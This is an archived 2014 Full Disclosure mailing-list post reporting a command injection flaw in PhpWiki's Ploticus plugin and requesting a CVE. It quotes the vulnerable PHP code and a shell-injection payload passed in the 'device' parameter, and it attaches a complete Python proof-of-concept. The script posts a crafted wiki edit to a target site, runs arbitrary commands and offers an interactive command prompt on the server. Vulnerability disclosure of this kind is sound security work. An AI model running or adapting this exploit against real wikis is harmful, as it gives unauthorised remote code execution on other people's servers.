[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] PHP-Wiki Command Injection
From: "Benjamin Harris" <bch () hush ! ai>
Date: 2014-08-27 22:23:45
Message-ID: 20140827222345.2D3DEC0112 () smtp ! hushmail ! com
[Download RAW message or body]
Hi All
OSS-Security, can I get a CVE for this please?
URL: https://sourceforge.net/projects/phpwiki/
I tried to report this a month ago, but got no response from the
developers. This is an old vulnerability I found while dusting off
some old hard drives.
Brief:
-------------------------
PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site
where anyone can edit the pages through an HTML form. Multiple
storage backends, dynamic hyperlinking, themeable, scriptable by
plugins, full authentication, ACL's.
Details:
--------------------------
Straight command injection in the Ploticus module. Attached is a
working POC.
I found these notes I made:
<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt=
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned
vuln code with system execute at the bottom
controllable param is $args
$gif = $argarray['device'];
$args = "-$gif -o $tempfile.$gif";
$code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");
['device'] is listed as an option by user when using the Politus
plugin
"
example usage;
<?plugin Ploticus device||=png [ploticus options...]
multiline ploticus script ...
?>
:>>
function getImage($dbi, $argarray, $request) {
//extract($this->getArgs($argstr, $request));
//extract($argarray);
$source =& $this->source;
if (!empty($source)) {
if ($this->withShellCommand($source)) {
$this->_errortext .= _("shell commands not allowed
in Ploticus");
return false;
}
if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
$src = "#proc getdata\ndata:";
$i = 0;
foreach ($argarray['data'] as $data) {
// hash or array?
if (is_array($data))
$src .= ("\t" . join(" ", $data) . "\n");
else
$src .= ("\t" . '"' . $data . '" ' . $i++ .
"\n");
}
$src .= $source;
$source = $src;
}
$tempfile = $this->tempnam('Ploticus','plo');
@unlink($tempfile);
$gif = $argarray['device'];
$args = "-$gif -o $tempfile.$gif";
if (!empty($argarray['-csmap'])) {
$args .= " -csmap -mapfile $tempfile.map";
$this->_mapfile = "$tempfile.map";
}
if (!empty($argarray['-prefab'])) {
//check $_ENV['PLOTICUS_PREFABS'] and default
directory
global $HTTP_ENV_VARS;
if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
if (file_exists("/usr/share/ploticus"))
$HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
"/usr/share/ploticus";
elseif (defined('PLOTICUS_PREFABS'))
$HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
constant('PLOTICUS_PREFABS');
}
$args .= (" -prefab " . $argarray['-prefab']);
}
if (isWindows()) {
$fp = fopen("$tempfile.plo", "w");
fwrite ($fp, $source);
fclose($fp);
$code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");
Many thanks,
Ben
["release.py" (text/x-python)]
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
import urllib
import urllib2
import sys
def banner():
print " ____ __ _ __ _ "
print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)"
print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / "
print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
print " /_/ /_/ /_/ \n"
def usage():
banner()
print " [+] Usage example"
print " [-] python " + sys.argv[0] + " http://path.to/wiki"
if len(sys.argv)< 2:
usage()
quit()
domain = sys.argv[1]
def commandexec(cmd):
data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo \
123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= \
>>'),('edit[preview]','Preview'),('action','edit')]) cmd1 = urllib2.Request(domain \
> > +'/index.php/HeIp',data)
cmd2 = urllib2.urlopen(cmd1)
output = cmd2.read()
firstloc = output.find("123:::\n") + len("123:::\n")
secondloc = output.find("\n:::123")
return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
cmd = raw_input('Run a command: ')
if cmd == 'quit':
print "[-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print commandexec(cmd)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic